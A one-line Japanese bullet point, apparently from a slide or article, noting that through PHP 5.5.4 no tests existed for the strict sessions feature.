• PHP5.5.4までの時点で、strict sessionsに関するテストが1つも存在しない